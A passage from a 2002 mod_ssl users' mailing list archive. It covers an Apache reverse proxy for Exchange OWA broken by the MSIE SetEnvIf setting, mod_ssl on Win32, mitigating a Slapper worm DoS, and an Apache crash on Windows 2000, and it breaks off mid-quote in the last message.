User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.1) Gecko/20020912
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl / mod_proxy interaction
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robin P. Blanchard" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


in effort to eventually setup a secure apache reverse proxy for exchange
2000's OWA, i've run into the following dilemma....

per the mod-ssl docs, i had the following declared globally:
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0

and realised after much wailing and gnashing of teeth that that line
caused the following (non-ssl) virtual host failed to operate correctly
under IE:

Listen 10.10.10.99:80

           ServerName              webmail.gactr.uga.edu
           UseCanonicalName        Off
           CustomLog       /tmp/webmail-trans.log combined
           ErrorLog        /tmp/webmail-error.log

           RedirectPermanent / http://webmail.gactr.uga.edu/exchange/
           ProxyRequests Off
           ProxyVia Full
           ProxyPass /exchange/ http://webmail.gactr.uga.edu/exchange/
           ProxyPassReverse /exchange/ 
http://webmail.gactr.uga.edu/exchange/
           ProxyPass /public/ http://webmail.gactr.uga.edu/public/
           ProxyPassReverse /public/ http://webmail.gactr.uga.edu/public/
           ProxyPass /ex2k/ http://webmail.gactr.uga.edu/ex2k/
           ProxyPassReverse /ex2k/ http://webmail.gactr.uga.edu/ex2k/
           ProxyPass /exchweb/ http://webmail.gactr.uga.edu/exchweb/
           ProxyPassReverse /exchweb/ http://webmail.gactr.uga.edu/exchweb/



So, I placed User-Agent config out of the global config and into each
SSL config. Now, the exchange 2000 proxy (currently non-SSL) is
correctly handled by IE. Obviously, though, I will be wanting to put
this proxy behind SSL, which I've already determined will not work
(using the mod_ssl recommended settings). Has anyone else run into a
similar situation? Is there a reasonable work-around for this?

-- 
----------------------------------------
Robin P. Blanchard
Systems Integration Specialist
Georgia Center for Continuing Education
fon: 706.542.2404 <|> fax: 706.542.6546
----------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 16:31:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA02814; Mon, 30 Sep 2002 16:30:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id QAA02756; Mon, 30 Sep 2002 16:29:56 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id aslubaaa for modssl-users@modssl.org; Mon, 30 Sep 2002 16:29:46 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVGW 2.5.2.12) with SMTP id M2002093016294427194
 for ; Mon, 30 Sep 2002 16:29:44 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Mon, 30 Sep 2002 16:28:10 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Mon, 30 Sep 2002 16:27:57 +0200
From: "Andre Schild" 
To: 
Subject: Antw: Re: Availability of mod_ssl for Apache 2.0.42  Win32
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA02783
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Look here for a current apache windows.

http://www.switzerland.net/Pneatec/

André

>>> theantigod@sympatico.ca 27.09.2002 15:10:55 >>>
Jeff Hagan wrote:
> Does anyone know when a release of mod_ssl supporting Apache 2.0.42
for
> Win32 will be available?
> 
> 
> Thank you,
> 
> --
> jeff h.
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
www.modssl.org 
> User Support Mailing List                     
modssl-users@modssl.org 
> Automated List Manager                           
majordomo@modssl.org 
> 

Jeff,

mod_ssl is integrated/included  (built in) with Apache 2.0.x

It is no longer a separate package.

Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 16:57:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA03255; Mon, 30 Sep 2002 16:56:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id QAA03240; Mon, 30 Sep 2002 16:55:37 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8UEtEP11596
	for ; Mon, 30 Sep 2002 15:55:19 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 30 Sep 2002 15:55:08 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F212D@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: mod_ssl / mod_proxy interaction
Date: Mon, 30 Sep 2002 15:55:06 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-15"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Could you eloborate on why you say that reverse proxy with SSL won't work?
We've been running it for years on our Exchange system here, although
granted that uses 5.5 rather than 2000. Testing of access to OWA 2000 is on
my to-do list.

Thank you.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute


> -----Original Message-----
> From: Robin P. Blanchard [mailto:robin.blanchard@georgiacenter.org]
> Sent: 30 September 2002 14:29
> To: modssl-users@modssl.org
> Subject: mod_ssl / mod_proxy interaction
> 
> 
> 
> in effort to eventually setup a secure apache reverse proxy 
> for exchange
> 2000's OWA, i've run into the following dilemma....
> 
> per the mod-ssl docs, i had the following declared globally:
> SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> downgrade-1.0 force-response-1.0
> 
> and realised after much wailing and gnashing of teeth that that line
> caused the following (non-ssl) virtual host failed to operate 
> correctly
> under IE:
> 
> Listen 10.10.10.99:80
> 
>            ServerName              webmail.gactr.uga.edu
>            UseCanonicalName        Off
>            CustomLog       /tmp/webmail-trans.log combined
>            ErrorLog        /tmp/webmail-error.log
> 
>            RedirectPermanent / http://webmail.gactr.uga.edu/exchange/
>            ProxyRequests Off
>            ProxyVia Full
>            ProxyPass /exchange/ http://webmail.gactr.uga.edu/exchange/
>            ProxyPassReverse /exchange/ 
> http://webmail.gactr.uga.edu/exchange/
>            ProxyPass /public/ http://webmail.gactr.uga.edu/public/
>            ProxyPassReverse /public/ 
> http://webmail.gactr.uga.edu/public/
>            ProxyPass /ex2k/ http://webmail.gactr.uga.edu/ex2k/
>            ProxyPassReverse /ex2k/ http://webmail.gactr.uga.edu/ex2k/
>            ProxyPass /exchweb/ http://webmail.gactr.uga.edu/exchweb/
>            ProxyPassReverse /exchweb/ 
> http://webmail.gactr.uga.edu/exchweb/
> 
> 
> 
> So, I placed User-Agent config out of the global config and into each
> SSL config. Now, the exchange 2000 proxy (currently non-SSL) is
> correctly handled by IE. Obviously, though, I will be wanting to put
> this proxy behind SSL, which I've already determined will not work
> (using the mod_ssl recommended settings). Has anyone else run into a
> similar situation? Is there a reasonable work-around for this?
> 
> -- 
> ----------------------------------------
> Robin P. Blanchard
> Systems Integration Specialist
> Georgia Center for Continuing Education
> fon: 706.542.2404 <|> fax: 706.542.6546
> ----------------------------------------
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 17:14:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03970; Mon, 30 Sep 2002 17:13:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.gactr.uga.edu id RAA03965; Mon, 30 Sep 2002 17:12:14 +0200 (MET DST)
Received: (qmail 912 invoked from network); 30 Sep 2002 15:12:08 -0000
Received: from unknown (HELO georgiacenter.org) ([10.10.25.125]) (envelope-sender )
          by mail.servers.gactr.gc.nat (qmail-ldap-1.03) with SMTP
          for ; 30 Sep 2002 15:12:08 -0000
Message-ID: <3D9869C8.1040700@georgiacenter.org>
Date: Mon, 30 Sep 2002 11:12:08 -0400
From: "Robin P. Blanchard" 
Organization: Georgia Center for Continuing Education
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.1) Gecko/20020912
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl / mod_proxy interaction
References: <9B66BBD37D5DD411B8CE00508B69700F033F212D@pborolocal.rnib.org.uk>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robin P. Blanchard" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

John.Airey@rnib.org.uk wrote:
> Could you eloborate on why you say that reverse proxy with SSL won't work?
> We've been running it for years on our Exchange system here, although
> granted that uses 5.5 rather than 2000. Testing of access to OWA 2000 is on
> my to-do list.

Sure. Here's what I've come up with thus far:

Here's all four possible combinations of accessing exchange OWA. Options 
1,2,4 all authenticate and load properly via using IE. Option 3 fails 
IIS's auth challenge. This is all *without* SSL. Should {SetEnvIf 
User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 
force-response-1.0} be set for the virual host (recommended for 
mod_ssl), IE will only understand the apache reverse proxy when first 
proxied through squid. ??? If not proxied first through squid, IE balks, 
fails to load the pages (won't even load IIS's auth challenge), spitting 
back it's generic "cannot find server" error. I've been trying to get 
this thing working now for weeks and have been dealing with the 
mod_proxy folks until just this AM when I determined that the above 
SetEnvIf flag was causing the problem. I'm currently attempting to 
figure out why IIS's auth challenge fails via the apache reverse proxy 
but succeeds when proxied first through squid. Nonetheless, put all this 
in with SSL (assuming you using the recommended above flag) and things 
are broken. Period.


1) direct to exchange/iis
# wget --server-response ebe1.gc.nat/exchange
--11:01:28--  http://ebe1.gc.nat/exchange
            => `exchange'
Resolving ebe1.gc.nat... done.
Connecting to ebe1.gc.nat[10.10.11.23]:80... connected.
HTTP request sent, awaiting response...
  1 HTTP/1.1 401 Access Denied
  2 Server: Microsoft-IIS/5.0
  3 Date: Mon, 30 Sep 2002 15:01:28 GMT
  4 WWW-Authenticate: Negotiate
  5 WWW-Authenticate: NTLM
  6 WWW-Authenticate: Basic realm="ebe1.gc.nat"
  7 Content-Length: 24
  8 Content-Type: text/html
Unknown authentication scheme.

2) exchange/iss via squid
# http_proxy="proxy.gactr.uga.edu:3128" wget --server-response 
ebe1.gc.nat/exchange
--11:02:01--  http://ebe1.gc.nat/exchange
            => `exchange'
Resolving proxy.gactr.uga.edu... done.
Connecting to proxy.gactr.uga.edu[10.10.10.180]:3128... connected.
Proxy request sent, awaiting response...
  1 HTTP/1.0 401 Unauthorized
  2 Server: Microsoft-IIS/5.0
  3 Date: Mon, 30 Sep 2002 15:02:01 GMT
  4 WWW-Authenticate: Negotiate
  5 WWW-Authenticate: NTLM
  6 WWW-Authenticate: Basic realm="ebe1.gc.nat"
  7 Content-Length: 24
  8 Content-Type: text/html
  9 X-Cache: MISS from proxy.gactr.uga.edu
10 Proxy-Connection: close
Unknown authentication scheme.

3) apache proxy
# wget --server-response webmail.gactr.uga.edu
--11:02:37--  http://webmail.gactr.uga.edu/
            => `index.html'
Resolving webmail.gactr.uga.edu... done.
Connecting to webmail.gactr.uga.edu[10.10.10.99]:80... connected.
HTTP request sent, awaiting response...
  1 HTTP/1.1 301 Moved Permanently
  2 Date: Mon, 30 Sep 2002 15:02:37 GMT
  3 Server: Apache/1.3.26 (Unix) mod_mp3/0.35 PHP/4.2.3 mod_perl/1.27 
mod_ssl/2.8.10 OpenSSL/0.9.6g
  4 Location: http://webmail.gactr.uga.edu/exchange/
  5 Connection: close
  6 Content-Type: text/html; charset=iso-8859-1
Location: http://webmail.gactr.uga.edu/exchange/ [following]
--11:02:37--  http://webmail.gactr.uga.edu/exchange/
            => `index.html'
Connecting to webmail.gactr.uga.edu[10.10.10.99]:80... connected.
HTTP request sent, awaiting response...
  1 HTTP/1.1 401 Access Denied
  2 Date: Mon, 30 Sep 2002 15:02:37 GMT
  3 Server: Microsoft-IIS/5.0
  4 WWW-Authenticate: Negotiate
  5 WWW-Authenticate: NTLM
  6 WWW-Authenticate: Basic realm="webmail.gactr.uga.edu"
  7 Content-Length: 24
  8 Content-Type: text/html
  9 Via: 1.1 webmail.gactr.uga.edu (Apache/1.3.26)
10 X-Cache: MISS from webmail.gactr.uga.edu
11 Keep-Alive: timeout=15, max=100
12 Connection: Keep-Alive
Unknown authentication scheme.

4) apache proxy via squid
# http_proxy="proxy.gactr.uga.edu:3128" wget --server-response 
webmail.gactr.uga.edu
--11:03:06--  http://webmail.gactr.uga.edu/
            => `index.html'
Resolving proxy.gactr.uga.edu... done.
Connecting to proxy.gactr.uga.edu[10.10.10.180]:3128... connected.
Proxy request sent, awaiting response...
  1 HTTP/1.0 301 Moved Permanently
  2 Date: Mon, 30 Sep 2002 15:03:06 GMT
  3 Server: Apache/1.3.26 (Unix) mod_mp3/0.35 PHP/4.2.3 mod_perl/1.27 
mod_ssl/2.8.10 OpenSSL/0.9.6g
  4 Location: http://webmail.gactr.uga.edu/exchange/
  5 Content-Type: text/html; charset=iso-8859-1
  6 X-Cache: MISS from proxy.gactr.uga.edu
  7 Proxy-Connection: close
Location: http://webmail.gactr.uga.edu/exchange/ [following]
--11:03:06--  http://webmail.gactr.uga.edu/exchange/
            => `index.html'
Connecting to proxy.gactr.uga.edu[10.10.10.180]:3128... connected.
Proxy request sent, awaiting response...
  1 HTTP/1.0 401 Unauthorized
  2 Date: Mon, 30 Sep 2002 15:03:06 GMT
  3 Server: Microsoft-IIS/5.0
  4 WWW-Authenticate: Negotiate
  5 WWW-Authenticate: NTLM
  6 WWW-Authenticate: Basic realm="webmail.gactr.uga.edu"
  7 Content-Length: 24
  8 Content-Type: text/html
  9 Via: 1.1 webmail.gactr.uga.edu (Apache/1.3.26)
10 X-Cache: MISS from webmail.gactr.uga.edu
11 X-Cache: MISS from proxy.gactr.uga.edu
12 Proxy-Connection: close
Unknown authentication scheme.


-- 
----------------------------------------
Robin P. Blanchard
Systems Integration Specialist
Georgia Center for Continuing Education
fon: 706.542.2404 <|> fax: 706.542.6546
----------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 19:02:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA06171; Mon, 30 Sep 2002 19:01:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA06142; Mon, 30 Sep 2002 19:00:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DF2BB4CE773; Mon, 30 Sep 2002 19:00:21 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3FBD3286B4; Mon, 30 Sep 2002 18:24:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from doctor.nl2k.ab.ca id NAA28791; Mon, 30 Sep 2002 13:56:54 +0200 (MET DST)
Received: from doctor.nl2k.ab.ca (IDENT:101@localhost.nl2k.ab.ca [127.0.0.1])
	by doctor.nl2k.ab.ca (8.12.6/8.12.6) with ESMTP id g8UBtRQY024002
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Mon, 30 Sep 2002 05:56:42 -0600 (MDT)
Received: (from doctor@localhost)
	by doctor.nl2k.ab.ca (8.12.6/8.12.6/Submit) id g8UBtQKS024001
	for modssl-users@modssl.org; Mon, 30 Sep 2002 05:55:26 -0600 (MDT)
Date: Mon, 30 Sep 2002 05:55:26 -0600
From: The Doctor 
To: modssl-users@modssl.org
Subject: Re: slapper(?) causing DoS/mutex file disappearing
Message-ID: <20020930055526.A23796@doctor.nl2k.ab.ca>
References: <20020929125402.C18448@gunman.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020929125402.C18448@gunman.org>; from gunther@gunman.org on Sun, Sep 29, 2002 at 12:54:02PM -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: The Doctor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, Sep 29, 2002 at 12:54:02PM -0700, P a u l Guth wrote:
> Starting last Thursday, we started to see one of our webservers
> become unresponsive for about 10 minutes...it seemed to be correlated
> with what appeared to be a slapper/OpenSSL worm attack.  We are
> not vulnerable to the worm but the attack seemed to use up some
> resources (not CPU) that prevented apache from answering more requests.
> Note that it corrects itself after 10 minutes or so without manual
> intervention.
> 
> Here's the ouput of our Server: header.
> Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6g mod_jk
> 
> The error in the logs is:
> [Thu Sep 26 20:55:18 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
> 
> There also are a lot of errors like this that start at the same time:
> [Thu Sep 26 20:49:36 2002] [error] mod_ssl: Child could not open SSLMutex lockfile /usr/local/apache/logs/ssl_mutex.22003 (System error follows)
> 
> And sure enough the mutex file on that server is gone.  It comes
> back on restart...but what the heck is going on here?  Anyone having
> similar issues?
> 
> This is driving me crazy as this is on our production servers and
> I'm not going to get a wink of sleep tonight unless I figure out
> how to stop it....
>

slapper if is not successful chokes your Web Server into overload.

solutions:

1)  Limit you Max s!  I limited my MaxKeepAliveRequests from 100 to 20.
2)  If on Cisco, use rate-Limiting.  Check http://www.cisco.com/warp/public/707/newsflash.html .

Painful meds but this is goingto be nasty!!
> ___________________________________________________________________
> P                     a                     u                     l
>                            g@gunman.org 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Member - Liberal International	On 11 Sept 2001 the WORLD was violated.
This is doctor@nl2k.ab.ca	Ici doctor@nl2k.ab.ca
Society MUST be saved! Extremists must dissolve.  
Beware of defining as intelligent only those who share your opinions
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 01:28:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA15261; Tue, 1 Oct 2002 01:27:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id BAA15257; Tue, 1 Oct 2002 01:27:08 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id ; Mon, 30 Sep 2002 16:27:00 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: modssl-users@modssl.org
Subject: Apache.exe generates errors and is closed by Windows.
Date: Mon, 30 Sep 2002 16:26:51 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C268D8.DAEF84B0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C268D8.DAEF84B0
Content-Type: text/plain

I am getting the above error on my Windows platform. The 
environment details are as follows:

OS: Windows 2000
Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10

The OS pops up a box with the above message and until the user acknowledges,
the system doesn't respond to any user requests. In a way, the system
"hangs".

Any ideas on how this can be resolved? Alternatively, can the server be made
to service user requests?

Thanks
Ramakrishna

------_=_NextPart_001_01C268D8.DAEF84B0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






Apache.exe generates errors and is closed by Windows.




I am getting the above error on my Windows platform. =
The 

environment details are as follows:




OS: Windows 2000

Server: Apache 1.3.26 with OpenSSL 0.9.6d and =
mod_ssl 2.8.10




The OS pops up a box with the above message and until =
the user acknowledges, the system doesn't respond to any user requests. =
In a way, the system "hangs".



Any ideas on how this can be resolved? Alternatively, =
can the server be made to service user requests?




Thanks

Ramakrishna





------_=_NextPart_001_01C268D8.DAEF84B0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:00:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA15603; Tue, 1 Oct 2002 01:59:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts26-srv.bellnexxia.net id BAA15597; Tue, 1 Oct 2002 01:59:03 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts26-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020930235859.DUOF21425.tomts26-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 19:58:59 -0400
Message-ID: <3D98E55A.50603@sympatico.ca>
Date: Mon, 30 Sep 2002 19:59:22 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache.exe generates errors and is closed by Windows.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> I am getting the above error on my Windows platform. The
> environment details are as follows:
> 
> OS: Windows 2000
> Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10
> 
> The OS pops up a box with the above message and until the user 
> acknowledges, the system doesn't respond to any user requests. In a way, 
> the system "hangs".
> 
> Any ideas on how this can be resolved? Alternatively, can the server be 
> made to service user requests?
> 
> Thanks
> Ramakrishna
> 

Ramakrishna,

Could you please explain what is 'the above error'.

Guess: Are you referring to an abnormal end.. a dialog that says a 
program is exiting unexpectedly?

Warning: You should not be using OpenSSL 0.9.6d - I thought you were 
using one of the new builds I made?

Advice: This error might happen if you did not have all of the parts or 
it is misconfigured.  You may find a clue in the error.log.  Have you 
ever had this working or are you failing on an initial install.

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:10:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16290; Tue, 1 Oct 2002 02:09:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id CAA16283; Tue, 1 Oct 2002 02:08:30 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id ; Mon, 30 Sep 2002 17:08:23 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache.exe generates errors and is closed by Windows.
Date: Mon, 30 Sep 2002 17:08:13 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C268DE.A28356A0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C268DE.A28356A0
Content-Type: text/plain

Chris,

I upgraded our system to use OpenSSL 0.9.6g from your latest build. However,
the error I was referring to occurred in the previous build that had version
0.9.6d of OpenSSL.

The error is a Dr.Watson error. The usual popup box comes with the above
message and until the user acknowledges, the system doesn't service any
requests. There aren't any useful messages that get logged either.

The complete message is as follows:
"Apache.exe generates errors and will be closed by Windows. You will need to
restart the program. An error log is being created."



> -----Original Message-----
> From: hunter [mailto:theantigod@sympatico.ca] 
> Sent: Monday, September 30, 2002 4:59 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache.exe generates errors and is closed by Windows.
> 
> 
> Ramakrishna Kuppa wrote:
> > I am getting the above error on my Windows platform. The 
> environment 
> > details are as follows:
> > 
> > OS: Windows 2000
> > Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10
> > 
> > The OS pops up a box with the above message and until the user
> > acknowledges, the system doesn't respond to any user 
> requests. In a way, 
> > the system "hangs".
> > 
> > Any ideas on how this can be resolved? Alternatively, can 
> the server 
> > be
> > made to service user requests?
> > 
> > Thanks
> > Ramakrishna
> > 
> 
> Ramakrishna,
> 
> Could you please explain what is 'the above error'.
> 
> Guess: Are you referring to an abnormal end.. a dialog that says a 
> program is exiting unexpectedly?
> 
> Warning: You should not be using OpenSSL 0.9.6d - I thought you were 
> using one of the new builds I made?
> 
> Advice: This error might happen if you did not have all of 
> the parts or 
> it is misconfigured.  You may find a clue in the error.log.  Have you 
> ever had this working or are you failing on an initial install.
> 
> Chris.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

------_=_NextPart_001_01C268DE.A28356A0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Apache.exe generates errors and is closed by =
Windows.




Chris,




I upgraded our system to use OpenSSL 0.9.6g from your =
latest build. However, the error I was referring to occurred in the =
previous build that had version 0.9.6d of OpenSSL.



The error is a Dr.Watson error. The usual popup box =
comes with the above message and until the user acknowledges, the =
system doesn't service any requests. There aren't any useful messages =
that get logged either.



The complete message is as follows:

"Apache.exe generates errors and will be closed =
by Windows. You will need to restart the program. An error log is being =
created."







> -----Original Message-----

> From: hunter [mailto:theantigod@sympatico.ca] 

> Sent: Monday, September 30, 2002 4:59 PM

> To: modssl-users@modssl.org

> Subject: Re: Apache.exe generates errors and is =
closed by Windows.

> 

> 

> Ramakrishna Kuppa wrote:

> > I am getting the above error on my Windows =
platform. The 

> environment 

> > details are as follows:

> > 

> > OS: Windows 2000

> > Server: Apache 1.3.26 with OpenSSL 0.9.6d =
and mod_ssl 2.8.10

> > 

> > The OS pops up a box with the above =
message and until the user

> > acknowledges, the system doesn't respond =
to any user 

> requests. In a way, 

> > the system "hangs".

> > 

> > Any ideas on how this can be resolved? =
Alternatively, can 

> the server 

> > be

> > made to service user requests?

> > 

> > Thanks

> > Ramakrishna

> > 

> 

> Ramakrishna,

> 

> Could you please explain what is 'the above =
error'.

> 

> Guess: Are you referring to an abnormal end.. a =
dialog that says a 

> program is exiting unexpectedly?

> 

> Warning: You should not be using OpenSSL 0.9.6d =
- I thought you were 

